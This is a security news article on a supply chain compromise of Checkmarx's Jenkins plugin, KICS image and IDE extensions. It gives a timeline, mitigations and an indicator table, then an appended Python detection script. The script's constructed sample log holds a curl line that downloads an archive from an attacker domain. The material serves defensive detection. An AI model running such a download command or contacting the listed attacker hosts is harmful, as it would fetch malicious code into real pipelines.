Hackers News
Threats

TeamPCP Compromises Checkmarx Jenkins Plugin

Jennifer Sherman
May 12, 2026

A supply chain attack that began with the compromise of an open-source scanner has now reached one of the industry's most widely used application security tools. In May 2026, a malicious version of the Checkmarx Jenkins AST plugin was quietly published to the Jenkins Marketplace, exposing development pipelines to credential theft and unauthorized access, as detailed in a

The incident traces back to a threat actor known as TeamPCP, whose earlier compromise of the Trivy scanner set off a chain reaction with far wider consequences than many initially expected.

The attack did not happen in a single moment. It unfolded over weeks, beginning on March 23, 2026, when attackers first pushed malicious code directly into Checkmarx's GitHub repository. That initial breach was linked to the TeamPCP supply chain compromise of the Trivy scanner, which the security community had flagged on March 19 as harvesting credentials from downstream users and the systems connected to them.

Analysts at Checkmarx traced the likely attack path back to the Trivy incident: credentials harvested in that campaign were probably what gave the attackers unauthorized access to Checkmarx's GitHub environment.

Once inside, the attackers interacted with internal repositories and pushed malicious code into key artifacts that are distributed to developers around the world.

The Jenkins Plugin Compromise

What followed was a multi-stage campaign with a growing blast radius. On April 22, 2026, a second wave of malicious artifacts was published, a sign that the attackers had retained or regained access after the initial containment effort. On April 25, a cybercriminal group later identified as LAPSUS$ posted data stolen from Checkmarx's GitHub repositories to the dark web, nearly a month after the suspected exfiltration on March 30.

The full scope became clearer in May, when a tampered version of the Jenkins AST plugin was uploaded to the Jenkins Marketplace as version 2026.5.09, giving the campaign a fresh foothold in CI/CD pipelines worldwide.

The Jenkins plugin attack marked a significant escalation of an already serious incident. The malicious build was made to behave exactly like the legitimate plugin, so development teams had little chance of noticing it during routine pipeline runs. The window of exposure ran from May 9, 2026 at 01:25 UTC to May 10, 2026 at 08:47 UTC.

Any organization that pulled the plugin during that window and used it in an active build pipeline may have been exposed. Checkmarx confirmed that the last known safe version is 2.0.13-829.vc72453fa_1c16, published in December 2025; teams running that version or any earlier release are not considered affected by this wave of the attack. Note the version numbering: the malicious release jumped from the 2.0.x line to a date-style 2026.5.09, so any Checkmarx AST plugin newer than the December 2025 build deserves a look.

Checkmarx moved quickly to remove the malicious plugin and is working to publish a verified clean replacement. Organizations that update plugins automatically are especially at risk, because the malicious version could have been pulled in silently with no visible change to the build configuration. Jenkins itself does not upgrade plugins without an administrator's action, but controllers rebuilt from a plugin list that resolves to the latest release would have picked up 2026.5.09 without anyone choosing it.

KICS and the Broader Artifact Exposure

The April wave hit a wider range of developer tools at once. The public KICS Docker image on Docker Hub was compromised between 12:31 and 12:59 UTC on April 22, 2026, and the ast-github-action was tampered with between 14:17 and 15:41 UTC the same day. The VS Code extensions for Checkmarx AST Results and Developer Assist were also replaced with malicious versions on both the Microsoft and Open VSX marketplaces.

According to the investigation, the primary purpose of the malicious code was to collect and exfiltrate credentials and secrets from affected environments: GitHub personal access tokens, cloud credentials for AWS, Azure and Google Cloud, Kubernetes service account tokens, SSH keys, and Docker registry credentials.

Checkmarx recommends that organizations immediately block outbound access to checkmarx[.]cx and audit[.]checkmarx[.]cx. Teams should also rotate every credential that may have been exposed, pin plugins, container images and GitHub Actions to verified SHA digests rather than mutable tags, disable auto-update on IDE extensions, and review CI/CD logs for references to tpcp.tar.gz, checkmarx[.]zone, or unexpected repositories such as tpcp-docs.

Indicators of Compromise (IoCs)

Type | Indicator | Description
File name | checkmarx-ast-scanner-2026.5.09.hpi | Malicious Jenkins AST plugin file
SHA256 | 01ff1e56fd59a8fa525d97e670f7f297a1a204331b89b2cd4e36a9abc6419203 | Hash of the malicious .hpi plugin file
File name | checkmarx-ast-scanner-2026.5.09.jar | Malicious Jenkins plugin JAR artifact
SHA256 | f50a96d26a5b0beb29de4127e82b2bf350c21511e5a43d286e43f798dc6cd53f | Hash of the malicious .jar plugin file
File name | checkmarx-ast-scanner-2026.5.09.pom | Malicious Jenkins plugin POM file
SHA256 | 3ddb8967919a801b3c383e58cddceab21138134c6a26560d99e2672e86f36f2a | Hash of the malicious .pom plugin file
Domain | checkmarx[.]cx | Attacker-controlled C2 domain
IP address | 91[.]195[.]240[.]123 | Resolves to checkmarx[.]cx (attacker infrastructure)
Domain | audit[.]checkmarx[.]cx | Attacker-controlled subdomain
IP address | 94[.]154[.]172[.]43 | Resolves to audit[.]checkmarx[.]cx
IP address | 94[.]154[.]172[.]183 | Resolves to updates[.]checkmarx[.]cx
Domain | checkmarx[.]zone | Attacker-controlled domain used in the March 23 wave
File name | tpcp.tar.gz | Malicious archive artifact linked to TeamPCP
Repository | tpcp-docs | Unexpected repository associated with TeamPCP activity
Docker image tag | checkmarx/kics:v2.1.20-debian | Malicious KICS Docker image tag
Docker image tag | checkmarx/kics:latest | Malicious KICS Docker image tag
SHA256 | 222e6bfed0f3b… | Malicious KICS Docker image digest (partial, see full advisory)
VSIX file | ast-results-2.53.0.vsix | Malicious VS Code extension from Open VSX (March wave)
VSIX file | cx-dev-assist-1.7.0.vsix | Malicious VS Code extension from Open VSX (March wave)
GitHub Action tag | checkmarx/ast-github-action:2.3.35 | Malicious GitHub Action tag (April wave)
VS Code extension version | checkmarx.ast-results:2.63 / 2.66 | Malicious AST Results extension versions
VS Code extension version | checkmarx.cx-dev-assist:1.17 / 1.19 | Malicious Developer Assist extension versions

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
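The plugin version check, hash comparison and CI log review recommended above, as an added example that is neither Checkmarx's code nor part of the original article. It assumes the standard Jenkins layout in which each installed plugin is a .jpi archive whose META-INF/MANIFEST.MF carries a Plugin-Version header, copies the hashes, version strings and indicators from the table above, and keeps the network indicators defanged in source, re-fanging them only in memory for matching. The SAMPLE_LOG lines and the build_sample_plugin helper are constructed for the demonstration, not real evidence, so the constructed archive's hash will not match the advisory; the version check is what flags it.

```python
import hashlib
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Optional

# Values copied from the advisory's IoC table.
MALICIOUS_PLUGIN_VERSION = "2026.5.09"
LAST_KNOWN_SAFE_VERSION = "2.0.13-829.vc72453fa_1c16"
MALICIOUS_SHA256 = {
    "01ff1e56fd59a8fa525d97e670f7f297a1a204331b89b2cd4e36a9abc6419203",  # .hpi
    "f50a96d26a5b0beb29de4127e82b2bf350c21511e5a43d286e43f798dc6cd53f",  # .jar
    "3ddb8967919a801b3c383e58cddceab21138134c6a26560d99e2672e86f36f2a",  # .pom
}
# Kept defanged so the file itself never carries a resolvable hostname.
DEFANGED_INDICATORS = [
    "checkmarx[.]cx", "audit[.]checkmarx[.]cx", "updates[.]checkmarx[.]cx",
    "checkmarx[.]zone", "91[.]195[.]240[.]123", "94[.]154[.]172[.]43",
    "94[.]154[.]172[.]183", "tpcp.tar.gz", "tpcp-docs",
]

# Constructed sample pipeline log (not real evidence).
SAMPLE_LOG = [
    "2026-05-09T03:12:44Z [Pipeline] sh + curl -sS https://updates.checkmarx.cx/tpcp.tar.gz -o /tmp/tpcp.tar.gz",
    "2026-05-09T03:12:45Z [Pipeline] git clone https://github.com/example-org/tpcp-docs",
    "2026-05-09T03:12:50Z [Pipeline] Checkmarx AST scan finished: 0 high, 2 medium",
]


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


def _numeric_prefix(version: str) -> tuple:
    """'2.0.13-829.vc72453fa_1c16' -> (2, 0, 13); '2026.5.09' -> (2026, 5, 9)."""
    m = re.match(r"\d+(?:\.\d+)*", version)
    return tuple(int(p) for p in m.group(0).split(".")) if m else ()


def plugin_version_status(version: str) -> str:
    """Classify an installed Checkmarx AST plugin version against the advisory."""
    if version == MALICIOUS_PLUGIN_VERSION:
        return "malicious"
    if version == LAST_KNOWN_SAFE_VERSION or _numeric_prefix(version) < _numeric_prefix(LAST_KNOWN_SAFE_VERSION):
        return "not-affected"
    # Newer than the last known-good build (or same 2.0.13 line with a different
    # build suffix) but not the listed IoC version: verify its digest by hand.
    return "review"


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def installed_plugin_version(jpi_path: Path) -> Optional[str]:
    """Read Plugin-Version from the plugin archive's META-INF/MANIFEST.MF."""
    with zipfile.ZipFile(jpi_path) as z:
        manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for line in manifest.splitlines():
        if line.startswith("Plugin-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def check_plugin_archive(jpi_path: Path) -> dict:
    """Combine the hash match and the version classification for one archive."""
    digest = sha256_of(jpi_path)
    version = installed_plugin_version(jpi_path)
    return {
        "path": str(jpi_path),
        "sha256": digest,
        "hash_match": digest in MALICIOUS_SHA256,
        "version": version,
        "version_status": plugin_version_status(version) if version else "unknown",
    }


def scan_log_lines(lines) -> list:
    """Return (line_no, defanged_indicator, line) for every log line mentioning an IoC."""
    needles = [(ind, refang(ind).lower()) for ind in DEFANGED_INDICATORS]
    hits = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        for defanged, fanged in needles:
            if fanged in low:
                hits.append((n, defanged, line.rstrip()))
    return hits


def build_sample_plugin(directory: Path, version: str) -> Path:
    """Write a minimal, constructed .jpi (a zip with only a manifest) for the demo."""
    jpi = directory / "checkmarx-ast-scanner.jpi"
    with zipfile.ZipFile(jpi, "w") as z:
        z.writestr("META-INF/MANIFEST.MF",
                   f"Manifest-Version: 1.0\r\nShort-Name: checkmarx-ast-scanner\r\nPlugin-Version: {version}\r\n")
    return jpi


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        print(check_plugin_archive(build_sample_plugin(Path(d), MALICIOUS_PLUGIN_VERSION)))
    for hit in scan_log_lines(SAMPLE_LOG):
        print(hit)
```

On a real controller, point check_plugin_archive at every file under $JENKINS_HOME/plugins/*.jpi and feed scan_log_lines the build console logs and the Jenkins system log; a hash match is conclusive, while a "review" verdict only means the build postdates the last known-good release and should be verified against the vendor's published digests.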
